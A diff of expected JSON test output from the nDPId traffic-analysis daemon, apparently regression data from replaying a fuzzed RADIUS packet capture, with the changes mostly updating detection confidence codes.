+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997257373,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":620000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1528997260021,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"flow_datalink":1,"flow_max_packets":3} 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1528997260021,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1528997260021,"pkt":"ABRP+4rqcNuYVcUnCABFAACy\/sZAAPxVVSnG4hk+CgxAHgcUchAAnp2\/A0UAlvMIt1JJhr\/PERoAnbXM5t8BNTAzMTE0czAxNTg4NDk2ODVAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywSN0ExM0FEN0UxOTJDQjEwQRIiMzI3NjQgU3Vic2NyaWJlciBub3QgcCUAdmlzaW9uZSUABwQBAAcAUBIlCbhyzGO3iZxohSCASLvo"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1528997261783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997261783,"pkt":"dxRP+4rqcNuYVcUnCABFAADh\/sxAAPwRVP3G4lI1CgxAHgcUchAAzQ3qC0YAxVP5rh2w5Lj8PI2upF4y\/0IBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXT3b3JrLm9yZywgNWIyMmE1ODkvZjA6N+g6NjA6ZDE6N2Q6MzcvMjIwT0oBAgBIFwEAAAEFAADvkK66gUfrDsISd3KA2Dq0AgUAAEGPAVxuDAAAtFagJxCAdoSLAQACCwUAAF3vTu1rfeBtyKrBBShZZHpQEiKq\/RQqlqya5NkwR6FJjV0="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997262078} 01258{"packet_event_id":1,"packet_event_name":"packet","packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997261783,"pkt":"AAAMB6xAABRP+4rqCABFAALHIP0lAP8RAAAKDEAexuIZNXIQBxQCswAAAUcCq0DUTgiBVRdCBPZhxwMy\/T4aCiUAV3EOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqWOATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yaS5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjODAwMDAwYmQ4OWE1MjI1YiwgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwBAasFAFKIA5WWldDMlQxc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkVAEAAAsFAADE2f3MRJYt4jvAki9JKC\/7AwIAIHMK7AgaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAB2V8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAZ8gRC0x5bmRodXJzdBoMABBXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVkGh0AADghExc0MC44MG84ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEV\/QAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEsOMLEiMSdbl\/UWsrT5hVfA="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997262272,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1528997262272,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997262272,"pkt":"ABRP+4rqcNuYVcUlCABFAAEw\/tJAAPwRVKjG4hk1CgxAHgdnchABHO9uAkcBFNPCS391ou+9cV+4e8winsYaCwAAV8gbBVNQQxpuAAABNxA00HHPRTyBsiZ\/6IZyvYM7SEcCX4QDUPpLB\/Nfl+7+pUh0wsa+NLqA2uxWkFDu5HiEeuARNLVaDzSIzbsbfVqWHWeSG0JbhaHnOPPCnMTZqtKCAvxt6AWKG1d8LjPCNKE\/ymsqNvHxATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNTg5L2YwOjc5OjYwOmQxOjdkOjM3LzIyMFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTw+nZtWuGBh7\/qdpxMTkR"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1528997265856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997265856,"pkt":"AAAMB6xAABRP+4rqCABFAALbIP5AAP8RAAAKDEAexuIZNXYQBxQCxwAAAUgCv9O29T0SiGycOGqRBCMxDvYaWgAAV8gOBFVTGgwAAFfIDQZ3aaRpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqWRATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d21yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtt2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XJQBpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWmVPTEwZmYxMGFjMDAwMDAwYmQ4OWE1MjI1YiwgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwBAasHAEQIA5WWldDMlRlc3RMYGIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAPAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5wbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyIoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfINhFWWlcgQzIgVGVzdCBMYWIaCwAAV8YlBVZ6VxoNAAA4IQ4HMDcwNzEabQAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tdjQuMTAyODM5Vxr2AAA4IRQGAAABAhoMAABnIRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASXNvLQ3D63zYosbefsmlVrg=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997266054,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1528997266054,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997266054,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/tpAAPwRVO\/G4hk1CjhAHgcUJQAAzZq1C0gAxTQDE\/syEk8COAKXrk0TJQABNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuTHR3b3JrLm9yZywgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwT0oBAgBIFwEAAAEFAADQlOBVyiA51UB5+BTRf1Z+AgUAAJqmOeZiwwAAElk1sqzX2LSLAQACCwUAAAF5eGigvLsuc5FvQXnfthRQEr72IV3uvADHqUwosXSRIBM="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997266054,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1528997050187,"flow_last_seen":1528997259951,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4564,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997266054,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1528997050187,"flow_last_seen":1528997259951,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4564,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00577{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":127,"packets-processed":104,"total-skipped-flows":0,"total-l4-payload-len":44703,"total-not-detected-flows":6,"total-guessed-flows":0,"total-detected-flows":16,"total-detection-updates":0,"total-updates":6,"current-active-flows":13,"total-active-flows":27,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":150,"global_ts_msec":1528997294157} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1528997294408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997294408,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/xpAAPsRVa\/G4hk1ChxAHgcUchAAzU8kC0oAxWEDMLFDKTYIfgbKyEyHMfIBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE1YWUvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjIxT0oBAjRIFwEAAAEFAACfFoRHbsDvI\/+46yBaysIsAgUAAJcLQv7ORgAASiNmmimRHNuLAQACCwUAAKEH8wkM8t7F6HlgkovXWwdQEo++iUihP9VHkRTh6mD7kgU="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997294665} 01255{"packet_event_id":1,"packet_event_name":"packet","packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997294408,"pkt":"AAAMB6xAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":130,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2296,"global_ts_msec":1528997294874} @@ -161,79 +161,79 @@ 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997300431,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQRLAP8RAAAKDEAexpYZNXIQBxQCxwAAAU4Cv5wdq9spC4sVMXMqpc65j64aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqW6ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BCblJ0d29yay5vcmdZAxB+CDFjaXNjL4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYyAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAPYmZiM2E1SjI1YiwgNWIyMmE1YjMvZjA6Nyk6NjA6ZDE6N2Q6MzcvMjJqBAasFAESIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq